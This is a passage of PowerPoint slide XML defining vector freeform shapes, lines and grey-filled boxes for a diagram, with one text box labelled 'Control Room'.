            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="5857" y="86"/>
                <a:ext cx="761" cy="725"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 282 w 322"/>
                  <a:gd name="T1" fmla="*/ 72 h 307"/>
                  <a:gd name="T2" fmla="*/ 253 w 322"/>
                  <a:gd name="T3" fmla="*/ 40 h 307"/>
                  <a:gd name="T4" fmla="*/ 166 w 322"/>
                  <a:gd name="T5" fmla="*/ 0 h 307"/>
                  <a:gd name="T6" fmla="*/ 123 w 322"/>
                  <a:gd name="T7" fmla="*/ 8 h 307"/>
                  <a:gd name="T8" fmla="*/ 0 w 322"/>
                  <a:gd name="T9" fmla="*/ 30 h 307"/>
                  <a:gd name="T10" fmla="*/ 83 w 322"/>
                  <a:gd name="T11" fmla="*/ 62 h 307"/>
                  <a:gd name="T12" fmla="*/ 130 w 322"/>
                  <a:gd name="T13" fmla="*/ 108 h 307"/>
                  <a:gd name="T14" fmla="*/ 173 w 322"/>
                  <a:gd name="T15" fmla="*/ 243 h 307"/>
                  <a:gd name="T16" fmla="*/ 140 w 322"/>
                  <a:gd name="T17" fmla="*/ 305 h 307"/>
                  <a:gd name="T18" fmla="*/ 138 w 322"/>
                  <a:gd name="T19" fmla="*/ 307 h 307"/>
                  <a:gd name="T20" fmla="*/ 249 w 322"/>
                  <a:gd name="T21" fmla="*/ 266 h 307"/>
                  <a:gd name="T22" fmla="*/ 293 w 322"/>
                  <a:gd name="T23" fmla="*/ 250 h 307"/>
                  <a:gd name="T24" fmla="*/ 322 w 322"/>
                  <a:gd name="T25" fmla="*/ 179 h 307"/>
                  <a:gd name="T26" fmla="*/ 282 w 322"/>
                  <a:gd name="T27" fmla="*/ 72 h 30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22"/>
                  <a:gd name="T43" fmla="*/ 0 h 307"/>
                  <a:gd name="T44" fmla="*/ 322 w 322"/>
                  <a:gd name="T45" fmla="*/ 307 h 30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22" h="307">
                    <a:moveTo>
                      <a:pt x="282" y="72"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="273" y="60"/>
                      <a:pt x="263" y="50"/>
                      <a:pt x="253" y="40"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="225" y="17"/>
                      <a:pt x="195" y="3"/>
                      <a:pt x="166" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="123" y="8"/>
                      <a:pt x="123" y="8"/>
                      <a:pt x="123" y="8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7" y="31"/>
                      <a:pt x="56" y="42"/>
                      <a:pt x="83" y="62"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="100" y="74"/>
                      <a:pt x="116" y="90"/>
                      <a:pt x="130" y="108"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="163" y="152"/>
                      <a:pt x="178" y="202"/>
                      <a:pt x="173" y="243"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="170" y="269"/>
                      <a:pt x="159" y="291"/>
                      <a:pt x="140" y="305"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="139" y="306"/>
                      <a:pt x="139" y="307"/>
                      <a:pt x="138" y="307"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="249" y="266"/>
                      <a:pt x="249" y="266"/>
                      <a:pt x="249" y="266"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="293" y="250"/>
                      <a:pt x="293" y="250"/>
                      <a:pt x="293" y="250"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="313" y="234"/>
                      <a:pt x="322" y="208"/>
                      <a:pt x="322" y="179"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="322" y="145"/>
                      <a:pt x="308" y="107"/>
                      <a:pt x="282" y="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3" name="Freeform 4894"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="6644" y="-51"/>
                <a:ext cx="692" cy="598"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 251 w 293"/>
                  <a:gd name="T1" fmla="*/ 56 h 253"/>
                  <a:gd name="T2" fmla="*/ 165 w 293"/>
                  <a:gd name="T3" fmla="*/ 0 h 253"/>
                  <a:gd name="T4" fmla="*/ 120 w 293"/>
                  <a:gd name="T5" fmla="*/ 8 h 253"/>
                  <a:gd name="T6" fmla="*/ 0 w 293"/>
                  <a:gd name="T7" fmla="*/ 29 h 253"/>
                  <a:gd name="T8" fmla="*/ 92 w 293"/>
                  <a:gd name="T9" fmla="*/ 84 h 253"/>
                  <a:gd name="T10" fmla="*/ 99 w 293"/>
                  <a:gd name="T11" fmla="*/ 93 h 253"/>
                  <a:gd name="T12" fmla="*/ 133 w 293"/>
                  <a:gd name="T13" fmla="*/ 166 h 253"/>
                  <a:gd name="T14" fmla="*/ 108 w 293"/>
                  <a:gd name="T15" fmla="*/ 253 h 253"/>
                  <a:gd name="T16" fmla="*/ 223 w 293"/>
                  <a:gd name="T17" fmla="*/ 211 h 253"/>
                  <a:gd name="T18" fmla="*/ 261 w 293"/>
                  <a:gd name="T19" fmla="*/ 197 h 253"/>
                  <a:gd name="T20" fmla="*/ 251 w 293"/>
                  <a:gd name="T21" fmla="*/ 56 h 2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93"/>
                  <a:gd name="T34" fmla="*/ 0 h 253"/>
                  <a:gd name="T35" fmla="*/ 293 w 293"/>
                  <a:gd name="T36" fmla="*/ 253 h 25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93" h="253">
                    <a:moveTo>
                      <a:pt x="251" y="56"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="227" y="24"/>
                      <a:pt x="194" y="4"/>
                      <a:pt x="165" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="120" y="8"/>
                      <a:pt x="120" y="8"/>
                      <a:pt x="120" y="8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31" y="33"/>
                      <a:pt x="65" y="52"/>
                      <a:pt x="92" y="84"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="95" y="87"/>
                      <a:pt x="97" y="90"/>
                      <a:pt x="99" y="93"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="117" y="116"/>
                      <a:pt x="128" y="142"/>
                      <a:pt x="133" y="166"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="140" y="202"/>
                      <a:pt x="132" y="235"/>
                      <a:pt x="108" y="253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61" y="197"/>
                      <a:pt x="261" y="197"/>
                      <a:pt x="261" y="197"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="293" y="169"/>
                      <a:pt x="290" y="107"/>
                      <a:pt x="251" y="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4" name="Freeform 4895"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="6249" y="18"/>
                <a:ext cx="725" cy="659"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 300 w 307"/>
                  <a:gd name="T1" fmla="*/ 137 h 279"/>
                  <a:gd name="T2" fmla="*/ 266 w 307"/>
                  <a:gd name="T3" fmla="*/ 64 h 279"/>
                  <a:gd name="T4" fmla="*/ 259 w 307"/>
                  <a:gd name="T5" fmla="*/ 55 h 279"/>
                  <a:gd name="T6" fmla="*/ 167 w 307"/>
                  <a:gd name="T7" fmla="*/ 0 h 279"/>
                  <a:gd name="T8" fmla="*/ 121 w 307"/>
                  <a:gd name="T9" fmla="*/ 8 h 279"/>
                  <a:gd name="T10" fmla="*/ 0 w 307"/>
                  <a:gd name="T11" fmla="*/ 29 h 279"/>
                  <a:gd name="T12" fmla="*/ 87 w 307"/>
                  <a:gd name="T13" fmla="*/ 69 h 279"/>
                  <a:gd name="T14" fmla="*/ 116 w 307"/>
                  <a:gd name="T15" fmla="*/ 101 h 279"/>
                  <a:gd name="T16" fmla="*/ 156 w 307"/>
                  <a:gd name="T17" fmla="*/ 208 h 279"/>
                  <a:gd name="T18" fmla="*/ 127 w 307"/>
                  <a:gd name="T19" fmla="*/ 279 h 279"/>
                  <a:gd name="T20" fmla="*/ 239 w 307"/>
                  <a:gd name="T21" fmla="*/ 238 h 279"/>
                  <a:gd name="T22" fmla="*/ 275 w 307"/>
                  <a:gd name="T23" fmla="*/ 224 h 279"/>
                  <a:gd name="T24" fmla="*/ 300 w 307"/>
                  <a:gd name="T25" fmla="*/ 137 h 2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07"/>
                  <a:gd name="T40" fmla="*/ 0 h 279"/>
                  <a:gd name="T41" fmla="*/ 307 w 307"/>
                  <a:gd name="T42" fmla="*/ 279 h 27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07" h="279">
                    <a:moveTo>
                      <a:pt x="300" y="137"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="295" y="113"/>
                      <a:pt x="284" y="87"/>
                      <a:pt x="266" y="64"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="264" y="61"/>
                      <a:pt x="262" y="58"/>
                      <a:pt x="259" y="55"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="232" y="23"/>
                      <a:pt x="198" y="4"/>
                      <a:pt x="167" y="0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29" y="32"/>
                      <a:pt x="59" y="46"/>
                      <a:pt x="87" y="69"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="97" y="79"/>
                      <a:pt x="107" y="89"/>
                      <a:pt x="116" y="101"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="142" y="136"/>
                      <a:pt x="156" y="174"/>
                      <a:pt x="156" y="208"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="156" y="237"/>
                      <a:pt x="147" y="263"/>
                      <a:pt x="127" y="279"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="239" y="238"/>
                      <a:pt x="239" y="238"/>
                      <a:pt x="239" y="238"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="275" y="224"/>
                      <a:pt x="275" y="224"/>
                      <a:pt x="275" y="224"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="299" y="206"/>
                      <a:pt x="307" y="173"/>
                      <a:pt x="300" y="137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5" name="Line 4896"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm flipV="1">
                <a:off x="5703" y="433"/>
                <a:ext cx="90" cy="24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6" name="Line 4897"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm flipV="1">
                <a:off x="5817" y="710"/>
                <a:ext cx="87" cy="2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" name="Line 4898"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm flipV="1">
                <a:off x="5512" y="268"/>
                <a:ext cx="90" cy="24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8" name="Line 4899"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm flipV="1">
                <a:off x="5188" y="313"/>
                <a:ext cx="90" cy="24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" name="Line 4900"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm flipV="1">
                <a:off x="5174" y="639"/>
                <a:ext cx="90" cy="24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0" name="Line 4901"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm flipV="1">
                <a:off x="5354" y="877"/>
                <a:ext cx="87" cy="24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1" name="Line 4902"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm flipV="1">
                <a:off x="5666" y="967"/>
                <a:ext cx="89" cy="24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202" name="Freeform 2784"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2287027" y="2369552"/>
              <a:ext cx="2063750" cy="555625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03" name="Text Box 4831"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2641205" y="1372910"/>
              <a:ext cx="107593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Arial" charset="0"/>
                </a:rPr>
                <a:t>Control Room</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="204" name="Group 2316"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="2676871" y="2010505"/>
              <a:ext cx="968375" cy="766762"/>
              <a:chOff x="4694" y="527"/>
              <a:chExt cx="610" cy="483"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="205" name="Freeform 2291"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm flipH="1">
                <a:off x="4694" y="527"/>
                <a:ext cx="610" cy="163"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 7139"/>
                  <a:gd name="T1" fmla="*/ 1077 h 1913"/>
                  <a:gd name="T2" fmla="*/ 4018 w 7139"/>
                  <a:gd name="T3" fmla="*/ 0 h 1913"/>
                  <a:gd name="T4" fmla="*/ 7139 w 7139"/>
                  <a:gd name="T5" fmla="*/ 836 h 1913"/>
                  <a:gd name="T6" fmla="*/ 3123 w 7139"/>
                  <a:gd name="T7" fmla="*/ 1913 h 1913"/>
                  <a:gd name="T8" fmla="*/ 0 w 7139"/>
                  <a:gd name="T9" fmla="*/ 1077 h 19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39"/>
                  <a:gd name="T16" fmla="*/ 0 h 1913"/>
                  <a:gd name="T17" fmla="*/ 7139 w 7139"/>
                  <a:gd name="T18" fmla="*/ 1913 h 19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39" h="1913">
                    <a:moveTo>
                      <a:pt x="0" y="1077"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="4018" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7139" y="836"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3123" y="1913"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="107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" name="Freeform 2292"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm flipH="1">
                <a:off x="4694" y="598"/>
                <a:ext cx="343" cy="412"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 4016 w 4016"/>
                  <a:gd name="T1" fmla="*/ 3737 h 4814"/>
                  <a:gd name="T2" fmla="*/ 4016 w 4016"/>
                  <a:gd name="T3" fmla="*/ 0 h 4814"/>
                  <a:gd name="T4" fmla="*/ 0 w 4016"/>
                  <a:gd name="T5" fmla="*/ 1077 h 4814"/>
                  <a:gd name="T6" fmla="*/ 0 w 4016"/>
                  <a:gd name="T7" fmla="*/ 4814 h 4814"/>
                  <a:gd name="T8" fmla="*/ 4016 w 4016"/>
                  <a:gd name="T9" fmla="*/ 3737 h 48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16"/>
                  <a:gd name="T16" fmla="*/ 0 h 4814"/>
                  <a:gd name="T17" fmla="*/ 4016 w 4016"/>
                  <a:gd name="T18" fmla="*/ 4814 h 48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16" h="4814">
                    <a:moveTo>
                      <a:pt x="4016" y="3737"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="4016" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="1077"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="4814"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4016" y="373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7" name="Freeform 2293"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm flipH="1">
                <a:off x="5037" y="619"/>
                <a:ext cx="267" cy="391"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 3123 w 3123"/>
                  <a:gd name="T1" fmla="*/ 4573 h 4573"/>
                  <a:gd name="T2" fmla="*/ 3123 w 3123"/>
                  <a:gd name="T3" fmla="*/ 836 h 4573"/>
                  <a:gd name="T4" fmla="*/ 0 w 3123"/>
                  <a:gd name="T5" fmla="*/ 0 h 4573"/>
                  <a:gd name="T6" fmla="*/ 0 w 3123"/>
                  <a:gd name="T7" fmla="*/ 3735 h 4573"/>
                  <a:gd name="T8" fmla="*/ 3123 w 3123"/>
                  <a:gd name="T9" fmla="*/ 4573 h 45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23"/>
                  <a:gd name="T16" fmla="*/ 0 h 4573"/>
                  <a:gd name="T17" fmla="*/ 3123 w 3123"/>
                  <a:gd name="T18" fmla="*/ 4573 h 45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23" h="4573">
                    <a:moveTo>
                      <a:pt x="3123" y="4573"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="3123" y="836"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="3735"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3123" y="457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" name="Freeform 2294"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm flipH="1">
                <a:off x="4718" y="809"/>
                <a:ext cx="293" cy="194"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 3425"/>
                  <a:gd name="T1" fmla="*/ 2267 h 2267"/>
                  <a:gd name="T2" fmla="*/ 0 w 3425"/>
                  <a:gd name="T3" fmla="*/ 916 h 2267"/>
                  <a:gd name="T4" fmla="*/ 3425 w 3425"/>
                  <a:gd name="T5" fmla="*/ 0 h 2267"/>
                  <a:gd name="T6" fmla="*/ 3425 w 3425"/>
                  <a:gd name="T7" fmla="*/ 1351 h 2267"/>
                  <a:gd name="T8" fmla="*/ 0 w 3425"/>
                  <a:gd name="T9" fmla="*/ 2267 h 22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25"/>
                  <a:gd name="T16" fmla="*/ 0 h 2267"/>
                  <a:gd name="T17" fmla="*/ 3425 w 3425"/>
                  <a:gd name="T18" fmla="*/ 2267 h 226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25" h="2267">
                    <a:moveTo>
                      <a:pt x="0" y="2267"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="916"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3425" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3425" y="1351"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="2267"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="B2B2B2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9" name="Freeform 2295"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm flipH="1">
                <a:off x="4831" y="937"/>
                <a:ext cx="65" cy="35"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 759 w 759"/>
                  <a:gd name="T1" fmla="*/ 203 h 407"/>
                  <a:gd name="T2" fmla="*/ 0 w 759"/>
                  <a:gd name="T3" fmla="*/ 0 h 407"/>
                  <a:gd name="T4" fmla="*/ 0 w 759"/>
                  <a:gd name="T5" fmla="*/ 407 h 407"/>
                  <a:gd name="T6" fmla="*/ 759 w 759"/>
                  <a:gd name="T7" fmla="*/ 203 h 40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59"/>
                  <a:gd name="T13" fmla="*/ 0 h 407"/>
                  <a:gd name="T14" fmla="*/ 759 w 759"/>
                  <a:gd name="T15" fmla="*/ 407 h 40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59" h="407">
                    <a:moveTo>
                      <a:pt x="759" y="203"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="407"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="759" y="203"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="B2B2B2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" name="Freeform 2296"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm flipH="1">
                <a:off x="4831" y="851"/>
                <a:ext cx="65" cy="104"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 759 w 759"/>
                  <a:gd name="T1" fmla="*/ 1214 h 1214"/>
                  <a:gd name="T2" fmla="*/ 759 w 759"/>
                  <a:gd name="T3" fmla="*/ 0 h 1214"/>
                  <a:gd name="T4" fmla="*/ 0 w 759"/>
                  <a:gd name="T5" fmla="*/ 203 h 1214"/>
                  <a:gd name="T6" fmla="*/ 0 w 759"/>
                  <a:gd name="T7" fmla="*/ 1011 h 1214"/>
                  <a:gd name="T8" fmla="*/ 759 w 759"/>
                  <a:gd name="T9" fmla="*/ 1214 h 1214"/>
                  <a:gd name="T10" fmla="*/ 759 w 759"/>
                  <a:gd name="T11" fmla="*/ 1214 h 12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59"/>
                  <a:gd name="T19" fmla="*/ 0 h 1214"/>
                  <a:gd name="T20" fmla="*/ 759 w 759"/>
                  <a:gd name="T21" fmla="*/ 1214 h 12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59" h="1214">
                    <a:moveTo>
                      <a:pt x="759" y="1214"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="759" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="203"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="1011"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="759" y="12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1" name="Freeform 2297"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm flipH="1">
                <a:off x="4933" y="965"/>
                <a:ext cx="65" cy="35"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 759 w 759"/>
                  <a:gd name="T1" fmla="*/ 203 h 407"/>
                  <a:gd name="T2" fmla="*/ 0 w 759"/>
                  <a:gd name="T3" fmla="*/ 0 h 407"/>
                  <a:gd name="T4" fmla="*/ 0 w 759"/>
                  <a:gd name="T5" fmla="*/ 407 h 407"/>
                  <a:gd name="T6" fmla="*/ 759 w 759"/>
                  <a:gd name="T7" fmla="*/ 203 h 40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59"/>
                  <a:gd name="T13" fmla="*/ 0 h 407"/>
                  <a:gd name="T14" fmla="*/ 759 w 759"/>
                  <a:gd name="T15" fmla="*/ 407 h 40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59" h="407">
                    <a:moveTo>
                      <a:pt x="759" y="203"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="407"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="759" y="203"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="B2B2B2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2" name="Freeform 2298"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm flipH="1">
                <a:off x="4933" y="878"/>
                <a:ext cx="65" cy="104"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 759 w 759"/>
                  <a:gd name="T1" fmla="*/ 1214 h 1214"/>
                  <a:gd name="T2" fmla="*/ 759 w 759"/>
                  <a:gd name="T3" fmla="*/ 0 h 1214"/>
                  <a:gd name="T4" fmla="*/ 0 w 759"/>
                  <a:gd name="T5" fmla="*/ 203 h 1214"/>
                  <a:gd name="T6" fmla="*/ 0 w 759"/>
                  <a:gd name="T7" fmla="*/ 1011 h 1214"/>
                  <a:gd name="T8" fmla="*/ 759 w 759"/>
                  <a:gd name="T9" fmla="*/ 1214 h 1214"/>
                  <a:gd name="T10" fmla="*/ 759 w 759"/>
                  <a:gd name="T11" fmla="*/ 1214 h 12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59"/>
                  <a:gd name="T19" fmla="*/ 0 h 1214"/>
                  <a:gd name="T20" fmla="*/ 759 w 759"/>
                  <a:gd name="T21" fmla="*/ 1214 h 12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59" h="1214">
                    <a:moveTo>
                      <a:pt x="759" y="1214"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="759" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="203"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="1011"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="759" y="12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3" name="Freeform 2299"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm flipH="1">
                <a:off x="4729" y="824"/>
                <a:ext cx="65" cy="103"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 758 w 758"/>
                  <a:gd name="T1" fmla="*/ 1214 h 1214"/>
                  <a:gd name="T2" fmla="*/ 758 w 758"/>
                  <a:gd name="T3" fmla="*/ 0 h 1214"/>
                  <a:gd name="T4" fmla="*/ 0 w 758"/>
                  <a:gd name="T5" fmla="*/ 203 h 1214"/>
                  <a:gd name="T6" fmla="*/ 0 w 758"/>
                  <a:gd name="T7" fmla="*/ 1011 h 1214"/>
                  <a:gd name="T8" fmla="*/ 758 w 758"/>
                  <a:gd name="T9" fmla="*/ 1214 h 1214"/>
                  <a:gd name="T10" fmla="*/ 758 w 758"/>
                  <a:gd name="T11" fmla="*/ 1214 h 12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58"/>
                  <a:gd name="T19" fmla="*/ 0 h 1214"/>
                  <a:gd name="T20" fmla="*/ 758 w 758"/>
                  <a:gd name="T21" fmla="*/ 1214 h 12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58" h="1214">
                    <a:moveTo>
                      <a:pt x="758" y="1214"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="758" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="203"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="1011"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="758" y="12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4" name="Freeform 2300"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm flipH="1">
                <a:off x="4729" y="910"/>
                <a:ext cx="65" cy="35"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 758 w 758"/>
                  <a:gd name="T1" fmla="*/ 203 h 406"/>
                  <a:gd name="T2" fmla="*/ 0 w 758"/>
                  <a:gd name="T3" fmla="*/ 0 h 406"/>
                  <a:gd name="T4" fmla="*/ 0 w 758"/>
                  <a:gd name="T5" fmla="*/ 406 h 406"/>
                  <a:gd name="T6" fmla="*/ 758 w 758"/>
                  <a:gd name="T7" fmla="*/ 203 h 40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58"/>
                  <a:gd name="T13" fmla="*/ 0 h 406"/>
                  <a:gd name="T14" fmla="*/ 758 w 758"/>
                  <a:gd name="T15" fmla="*/ 406 h 40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58" h="406">
                    <a:moveTo>
                      <a:pt x="758" y="203"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="406"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="758" y="203"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="B2B2B2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5" name="Freeform 2304"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm flipH="1">
                <a:off x="4694" y="637"/>
                <a:ext cx="343" cy="98"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
